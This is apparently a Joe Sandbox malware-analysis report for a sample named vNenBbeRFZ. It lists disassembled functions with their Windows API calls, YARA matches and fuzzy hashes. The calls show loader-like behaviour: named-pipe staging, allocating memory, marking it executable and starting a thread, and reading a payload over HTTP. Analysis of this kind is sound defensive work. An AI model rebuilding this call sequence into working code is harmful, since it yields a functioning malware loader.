Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: Crypt$Context$Acquire$RandomRelease
String ID: Microsoft Base Cryptographic Provider v1.0
API String ID: 685801729-291530887
Opcode ID: aba3b44244b931d395b975f197aaaffdbadcb8e0fdd478486344e1fee862dfba
Instruction ID: d178e3b7d502100862c2b7d92a4ff418993770905ee7ae4d8bcfa2d7f8c41364
Opcode Fuzzy Hash: aba3b44244b931d395b975f197aaaffdbadcb8e0fdd478486344e1fee862dfba
Instruction Fuzzy Hash: 5CF03C36950258BBDF209A918D09F8E7B6CEB49B61F104066BD05E7144E7B1AA04A7A4

Function 0040161C Relevance: 6.1, APIs: 4, Instructions: 56pipefileCOMMON

Download Yara Rule

APIs

CreateNamedPipeA.KERNEL32 ref: 00401671
ConnectNamedPipe.KERNELBASE ref: 0040168D
WriteFile.KERNEL32 ref: 004016B7
CloseHandle.KERNELBASE ref: 004016C7

Memory Dump Source

Source File: 00000000.00000002.4136714904.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4136703049.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136727118.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136738409.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136748950.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vNenBbeRFZ.jbxd

Similarity

API ID: NamedPipe$CloseConnectCreateFileHandleWrite
String ID:
API String ID: 2239253087-0
Opcode ID: ee01374f37c01bed3004fdc6c5b71734f3108593b623f18b7072958c7fa087ae
Instruction ID: f6557cddfac509ebdc2c559bb4b98a48c26cbab32b326cd36dfde675f036fe09
Opcode Fuzzy Hash: ee01374f37c01bed3004fdc6c5b71734f3108593b623f18b7072958c7fa087ae
Instruction Fuzzy Hash: B9114FB08043059FD7109F65C94836FBFF8EB84358F01892EE895AB391D3BA84588FD6

Function 03D72972 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 169
networkfileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 03D729B3
__snprintf.LIBCMT ref: 03D729DA

Part of subcall function 03D782AE: _memset.LIBCMT ref: 03D782CF

__snprintf.LIBCMT ref: 03D72A21
__snprintf.LIBCMT ref: 03D72A38
HttpOpenRequestA.WININET(00000000,?,00000000,00000000,03D9E540,03DA6C58), ref: 03D72A67
HttpSendRequestA.WININET(00000000,?,?,03D72B52,?), ref: 03D72A90
InternetCloseHandle.WININET(00000000), ref: 03D72AAD
InternetQueryDataAvailable.WININET(00000000,03D71544,00000000,00000000), ref: 03D72ABE
InternetReadFile.WININET(00000000,?,00001000,?), ref: 03D72AEC
InternetCloseHandle.WININET(00000000), ref: 03D72B0C
InternetCloseHandle.WININET(00000000), ref: 03D72B2D

Strings

*/*, xrefs: 03D7299A
%s%s, xrefs: 03D72A31

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle__snprintf$HttpRequest_memset$AvailableDataFileOpenQueryReadSend
String ID: %s%s$*/*
API String ID: 2581463937-856325523
Opcode ID: df8477f502b1315b882b986d6dfc1a8cc187bb9d5e8b062bed2fe3949c422cea
Instruction ID: 89abe815774c093519308dbbc69b3575ee832d0f5d561e2cab61996baa7a51f2
Opcode Fuzzy Hash: df8477f502b1315b882b986d6dfc1a8cc187bb9d5e8b062bed2fe3949c422cea
Instruction Fuzzy Hash: 7B517E72900259BFDF22EFA4DC84DEE7BBDFF09710F044869F514AB250E6319A449B61

Function 03D71B65 Relevance: 21.4, APIs: 14, Instructions: 422
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03D76FE0: htonl.WS2_32(8903DADF), ref: 03D76FF6

CreateFileMappingA.KERNEL32(000000FF,00000000,00000040,00000000,00000180,00000000), ref: 03D71D33
MapViewOfFile.KERNEL32(00000000,000F003F,00000000,00000000,00000000,?,?,00000080,?,?,?,03D74AEE,03DA41A8,00000000,00000001,03D9E534), ref: 03D71D48
CloseHandle.KERNEL32(00000000,?,?,00000080,?,?,?,03D74AEE,03DA41A8,00000000,00000001,03D9E534,00000080), ref: 03D71D54
GetLastError.KERNEL32(?,?,00000080,?,?,?,03D74AEE,03DA41A8,00000000,00000001,03D9E534,00000080), ref: 03D71DAF
_memset.LIBCMT ref: 03D71DFD
_memset.LIBCMT ref: 03D71E3D
_memset.LIBCMT ref: 03D71E87
_memset.LIBCMT ref: 03D71ED1
_memset.LIBCMT ref: 03D71F1B
_memset.LIBCMT ref: 03D71F6B
_memset.LIBCMT ref: 03D71F93

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: _memset$File$CloseCreateErrorHandleLastMappingViewhtonl
String ID:
API String ID: 423609709-0
Opcode ID: 177bc80566a4efc9fb62da01f9475f15d96d83274849bb0812fa6ac7991cf4a0
Instruction ID: 533dc08686db2de0ec888c4eb3353da314a6ad10a3b85e16efe817895922ece3
Opcode Fuzzy Hash: 177bc80566a4efc9fb62da01f9475f15d96d83274849bb0812fa6ac7991cf4a0
Instruction Fuzzy Hash: B8D1B1B79007019FDB20DFA4DD8196BB7FAFB882047184A3DF196D6A50F231F9598B20

Function 00401805 Relevance: 21.0, APIs: 3, Strings: 9, Instructions: 31
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040180B
sprintf.MSVCRT ref: 00401875
CreateThread.KERNELBASE ref: 004018A9

Strings

., xrefs: 0040184A
i, xrefs: 00401832
\, xrefs: 0040185A
p, xrefs: 0040183A
p, xrefs: 0040182A
\, xrefs: 00401818
\, xrefs: 00401842
e, xrefs: 00401822
\, xrefs: 00401852

Memory Dump Source

Source File: 00000000.00000002.4136714904.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4136703049.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136727118.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136738409.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136748950.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vNenBbeRFZ.jbxd

Similarity

API ID: CountCreateThreadTicksprintf
String ID: .$\$\$\$\$e$i$p$p
API String ID: 1367138260-609229641
Opcode ID: f690e450e8ecac8a2604a58303104dcb48c2ba6cbbf9b4402698d21807f5fb22
Instruction ID: c05521fb74523171dae0a9dfb1991c292ce7a91c19fb210c51b7b8f5ae0065a3
Opcode Fuzzy Hash: f690e450e8ecac8a2604a58303104dcb48c2ba6cbbf9b4402698d21807f5fb22
Instruction Fuzzy Hash: 76016CB4408701DFE300AF15D95C31BBEE1AB84749F00891DE5992A290C7BE8658CF9A

Function 03D76DF0 Relevance: 12.1, APIs: 8, Instructions: 124
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetACP.KERNEL32(00000000,00000000,00000080,?,?,?,?,?,?,?,?,03D714A7,00000000,00000000), ref: 03D76DF9
GetOEMCP.KERNEL32(?,?,?,?,?,?,?,?,03D714A7,00000000,00000000), ref: 03D76E05
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,03D714A7,00000000), ref: 03D76E32
GetTickCount.KERNEL32 ref: 03D76E36

Part of subcall function 03D85CDA: __getptd.LIBCMT ref: 03D85CDF

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,03D714A7,00000000), ref: 03D76E63
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,03D714A7,00000000), ref: 03D76EC9
_memset.LIBCMT ref: 03D76F00
_memset.LIBCMT ref: 03D76F3F

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: CurrentProcess$_memset$CountTick__getptd
String ID:
API String ID: 3908538216-0
Opcode ID: 09091b8e1ccc0c484263aac5801867a66a701972f60d69d33a1276f3a26d5983
Instruction ID: d0ad83dc79a9f09576b0dbb52f95f9950bc08f14a8a5e413b4564fbdc415ef5d
Opcode Fuzzy Hash: 09091b8e1ccc0c484263aac5801867a66a701972f60d69d33a1276f3a26d5983
Instruction Fuzzy Hash: 4031A57BC00348AADB10FBB4ED45E9E7B68EF08724F144456E904EF281FA74DA489675

Function 03D7131C Relevance: 7.8, APIs: 5, Instructions: 280
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03D76F4C: _malloc.LIBCMT ref: 03D76F52
Part of subcall function 03D76F4C: _malloc.LIBCMT ref: 03D76F62

_malloc.LIBCMT ref: 03D713A4

Part of subcall function 03D858CD: __FF_MSGBANNER.LIBCMT ref: 03D858F0
Part of subcall function 03D858CD: __NMSG_WRITE.LIBCMT ref: 03D858F7
Part of subcall function 03D858CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C,03D876FE), ref: 03D85944

Part of subcall function 03D7BC8C: _malloc.LIBCMT ref: 03D7BCB3
Part of subcall function 03D7BC8C: _memset.LIBCMT ref: 03D7BCE1

Part of subcall function 03D7BC8C: _realloc.LIBCMT ref: 03D7BCC2

_malloc.LIBCMT ref: 03D7146D
__snprintf.LIBCMT ref: 03D714D6
__snprintf.LIBCMT ref: 03D714F4
__snprintf.LIBCMT ref: 03D71512

Part of subcall function 03D7B5FE: Sleep.KERNEL32(000003E8,00000000,00000000,03D7167C), ref: 03D7B634
Part of subcall function 03D7B5FE: ExitThread.KERNEL32 ref: 03D7B63E

Part of subcall function 03D78E9C: htonl.WS2_32(00000000), ref: 03D78EB3
Part of subcall function 03D78E9C: htonl.WS2_32(?), ref: 03D78EBC
Part of subcall function 03D78E9C: _memset.LIBCMT ref: 03D78EE5

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: _malloc$__snprintf$_memsethtonl$AllocateExitHeapSleepThread_realloc
String ID:
API String ID: 281750196-0
Opcode ID: 9ad5c04b928a968e6e7a348f33528b3e29999f994bcab5b563a57b0ef3bb6d0f
Instruction ID: 14cce670ab22fa21a126c7db518a91eeef8fe09d4ae9350587c01e5122a62a88
Opcode Fuzzy Hash: 9ad5c04b928a968e6e7a348f33528b3e29999f994bcab5b563a57b0ef3bb6d0f
Instruction Fuzzy Hash: 8881F2BA6043006ED720FB719D01B2FBAE9EFC4751F184A2EF5949E290FE71C5418A72

Function 03D792E4 Relevance: 7.6, APIs: 5, Instructions: 63
filememoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32(?,00000000,0000001C), ref: 03D7931B
HeapDestroy.KERNEL32(?), ref: 03D79343
VirtualFree.KERNEL32(?,00000000,00008000), ref: 03D7935A
VirtualFree.KERNEL32(?,00000000,00008000), ref: 03D79365
UnmapViewOfFile.KERNEL32(?), ref: 03D79373

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: Virtual$Free$DestroyFileHeapQueryUnmapView
String ID:
API String ID: 4268163748-0
Opcode ID: b2679208a5f37bf64479f85a134d40c21f38dc00d2ac9f92da549098a6b78759
Instruction ID: 8f4700802e7a084a7eff9f4619f0d05b9acbb9d96e8b14465caf7e93e5d94750
Opcode Fuzzy Hash: b2679208a5f37bf64479f85a134d40c21f38dc00d2ac9f92da549098a6b78759
Instruction Fuzzy Hash: 33115E37D00615EACB20EB74D8A5FAE776CEB42B51F084166F402EA294E774D981DAA0

Function 0040156C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00401592
VirtualProtect.KERNELBASE ref: 004015D8
CreateThread.KERNELBASE ref: 0040160C

Strings

, xrefs: 004015D0

Memory Dump Source

Source File: 00000000.00000002.4136714904.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4136703049.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136727118.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136738409.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136748950.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vNenBbeRFZ.jbxd

Similarity

API ID: Virtual$AllocCreateProtectThread
String ID:
API String ID: 3039780055-3916222277
Opcode ID: 112bfe249dd6045d3e243922ffc4117092a7b42fa1748565b480907dbb455478
Instruction ID: 2c3614ce65a7367fa80fe32f9ea81ce42d41b7cad0b0b7c8a751d159444ea28c
Opcode Fuzzy Hash: 112bfe249dd6045d3e243922ffc4117092a7b42fa1748565b480907dbb455478
Instruction Fuzzy Hash: 3F1148B0408305AFD700AF24C58835EBFF4EB88318F40C86EE89A8B391D37984198B92

Function 001100CE Relevance: 6.1, APIs: 4, Instructions: 75
networkmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpOpenRequestA.WININET(3B2E55EB,00000000,00000000,00110143,00000000,00000000,00000000,84400200,00000000,?,696E6977,0074656E), ref: 001100E2
InternetErrorDlg.WININET(0BE057B7,00000000,00000000,?,00000007,00000000,?,696E6977,0074656E), ref: 00110127
VirtualAlloc.KERNELBASE(E553A458,00000000,00400000,00001000,00000040,?,696E6977,0074656E), ref: 001102DC
InternetReadFile.WININET(E2899612,00000000,001100F3,00002000,?,001100F3,?,?,696E6977,0074656E), ref: 001102F7

Memory Dump Source

Source File: 00000000.00000002.4136642076.0000000000110000.00000020.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_110000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: Internet$AllocErrorFileHttpOpenReadRequestVirtual
String ID:
API String ID: 825455464-0
Opcode ID: c825f18c99f9df7cf564f541a7d8b5394c2efc7e3cb1da508c9495459e7d8d3c
Instruction ID: c858529b53ccb9cc0cf12de86a9a89a2d5f6dc8971a6b10575a67a2b86871309
Opcode Fuzzy Hash: c825f18c99f9df7cf564f541a7d8b5394c2efc7e3cb1da508c9495459e7d8d3c
Instruction Fuzzy Hash: 040128A1B852493AF63901B78C9AF7B695DCBC9FE4F2681387108921C4EEE0DC808038

Function 0011008F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25librarynetworkCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(0726774C,?,696E6977,0074656E), ref: 001100A0
InternetOpenA.WININET(A779563A,00000000,00000000,00000000,00000000,00000000,?,696E6977,0074656E), ref: 001100AE

Strings

.141, xrefs: 00110316

Memory Dump Source

Source File: 00000000.00000002.4136642076.0000000000110000.00000020.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_110000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: InternetLibraryLoadOpen
String ID: .141
API String ID: 2559873147-2935257979
Opcode ID: fa350be56840f660c3c46759bd5b56af53baab766a541bf3ba28443331d946ee
Instruction ID: 5a1791c1944033536f4d64f756dc865fc8dde3df5f75cfe976c000857d266b92
Opcode Fuzzy Hash: fa350be56840f660c3c46759bd5b56af53baab766a541bf3ba28443331d946ee
Instruction Fuzzy Hash: 42E0C21040E2C6BAD3272E318C26B97BF629BCBB08FA200E9F0C0044428B9340D0D263

Function 00401296 Relevance: 5.1, APIs: 4, Instructions: 79stringCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 004012EB
strlen.MSVCRT ref: 0040131B
malloc.MSVCRT ref: 00401326
memcpy.MSVCRT ref: 0040133C

Memory Dump Source

Source File: 00000000.00000002.4136714904.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4136703049.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136727118.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136738409.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136748950.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vNenBbeRFZ.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 5372cf87dc63ad0534f215130e9711348a0f3cbc5a304c0411c143a1abbd0b43
Instruction ID: 5fae3b927bb25fc2e4b80d4536c66c7aa3e20575f9204dbf45e08d0644cd0e42
Opcode Fuzzy Hash: 5372cf87dc63ad0534f215130e9711348a0f3cbc5a304c0411c143a1abbd0b43
Instruction Fuzzy Hash: FC3133B0A007058FDB10DF64DA8065EBBE0FB44304F14853ED988A73A1E378A945CF89

Function 004013B3 Relevance: 5.1, APIs: 4, Instructions: 65stringCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 004012EB
strlen.MSVCRT ref: 0040131B
malloc.MSVCRT ref: 00401326
memcpy.MSVCRT ref: 0040133C

Memory Dump Source

Source File: 00000000.00000002.4136714904.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4136703049.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136727118.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136738409.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136748950.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vNenBbeRFZ.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: dff1f69355662ee62dc8f57431a0a1033ef415c0d3bb9d86554702d374650cac
Instruction ID: aa46cd1139d78247506502ea4578393288f3bd951cc91367c1752dbee521815d
Opcode Fuzzy Hash: dff1f69355662ee62dc8f57431a0a1033ef415c0d3bb9d86554702d374650cac
Instruction Fuzzy Hash: 152137B4A00601CFCB10EF69DA8065EB7F0FB88304F10843ED948A7360E734A945CF99

Function 03D72BF0 Relevance: 4.6, APIs: 3, Instructions: 66networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03D72B61: WSAStartup.WS2_32(00000202,?), ref: 03D72B7F
Part of subcall function 03D72B61: WSACleanup.WS2_32 ref: 03D72B89

WSASocketA.WS2_32(00000002,00000002,00000000,00000000,00000000,00000000), ref: 03D72C10
WSAIoctl.WS2_32(00000000,4004747F,00000000,00000000,?,000005F0,?,00000000,00000000), ref: 03D72C3B
closesocket.WS2_32(00000000), ref: 03D72C7A

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: CleanupIoctlSocketStartupclosesocket
String ID:
API String ID: 1100289767-0
Opcode ID: f291d82955d933b04fab8e185336bfdd7ab12260335070130962f30df2fcc87c
Instruction ID: 57823bd81089e838ce2892aa0843bfb5c7dbdd6cc70c0d2cbc3c57d1ba13d892
Opcode Fuzzy Hash: f291d82955d933b04fab8e185336bfdd7ab12260335070130962f30df2fcc87c
Instruction Fuzzy Hash: 16112931601224BFD720DA76DC49EFB7FADDB81B60F1444A1F905D7280E6358A408A60

Function 03D74AB7 Relevance: 4.6, APIs: 3, Instructions: 58memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

htonl.WS2_32(03D9E534), ref: 03D74ADA
_memset.LIBCMT ref: 03D74B2D
VirtualProtect.KERNELBASE(?,?,00000020,?,?,?,?,?,?,?,?,?,?,03D9E534,00000080), ref: 03D74B3F

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: ProtectVirtual_memsethtonl
String ID:
API String ID: 3989328505-0
Opcode ID: 13887fad7e17584b3c0072b2ad24336d9badf001d32a1ceb3a3ee8a2323a3b8c
Instruction ID: 19af0a9fcfc3e1d8f23972323f080e0498fbd37e1faccbdf7b506a18bb72a970
Opcode Fuzzy Hash: 13887fad7e17584b3c0072b2ad24336d9badf001d32a1ceb3a3ee8a2323a3b8c
Instruction Fuzzy Hash: 8711A976E01714AADB13EBA69D46F9EB778EF14744F044021E900B6241F6709D158BB4

Function 00401700 Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE ref: 0040174D
ReadFile.KERNELBASE ref: 0040177D
CloseHandle.KERNEL32 ref: 0040178D

Memory Dump Source

Source File: 00000000.00000002.4136714904.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4136703049.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136727118.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136738409.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136748950.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vNenBbeRFZ.jbxd

Similarity

API ID: File$CloseCreateHandleRead
String ID:
API String ID: 1035965006-0
Opcode ID: 11cea648a2b243e4a93cddea164c51586228acff2b04c5d1c86caa04e61bd9bd
Instruction ID: 6fab218aa5f7a0ca60a69a80a3c6987e30c09701ab46379e1624833ea9df46a3
Opcode Fuzzy Hash: 11cea648a2b243e4a93cddea164c51586228acff2b04c5d1c86caa04e61bd9bd
Instruction Fuzzy Hash: 2F1148B18083059BC700AF28C54835BBBF4EB84354F01892EE895AB291D3B985198FD6

Function 03D76F4C Relevance: 4.5, APIs: 3, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 03D76F52

Part of subcall function 03D858CD: __FF_MSGBANNER.LIBCMT ref: 03D858F0
Part of subcall function 03D858CD: __NMSG_WRITE.LIBCMT ref: 03D858F7
Part of subcall function 03D858CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C,03D876FE), ref: 03D85944

_malloc.LIBCMT ref: 03D76F62
_memset.LIBCMT ref: 03D76F7F

Part of subcall function 03D857F0: __lock.LIBCMT ref: 03D8580E
Part of subcall function 03D857F0: ___sbh_find_block.LIBCMT ref: 03D85819
Part of subcall function 03D857F0: ___sbh_free_block.LIBCMT ref: 03D85828
Part of subcall function 03D857F0: HeapFree.KERNEL32(00000000,00000000,03DA05E8,0000000C,03D8A726,00000000,?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C), ref: 03D85858
Part of subcall function 03D857F0: GetLastError.KERNEL32(?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C,03D876FE,00000000,00000000,?,03D8A7E0,0000000D), ref: 03D85869

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: Heap_malloc$AllocateErrorFreeLast___sbh_find_block___sbh_free_block__lock_memset
String ID:
API String ID: 1561657895-0
Opcode ID: 8d34299d883a5e7b0359f53c4d9d19c18ce8020fdd1c2e9ac3044bc60723efdd
Instruction ID: db0e947664282742d2ad9782aa31e6110c757904516e74e61127e29f29ae3765
Opcode Fuzzy Hash: 8d34299d883a5e7b0359f53c4d9d19c18ce8020fdd1c2e9ac3044bc60723efdd
Instruction Fuzzy Hash: A5E09B3F50571536C621B7A9EC00E9F6A2ACF83AB0F144466F50C9D140FA11E90656F5

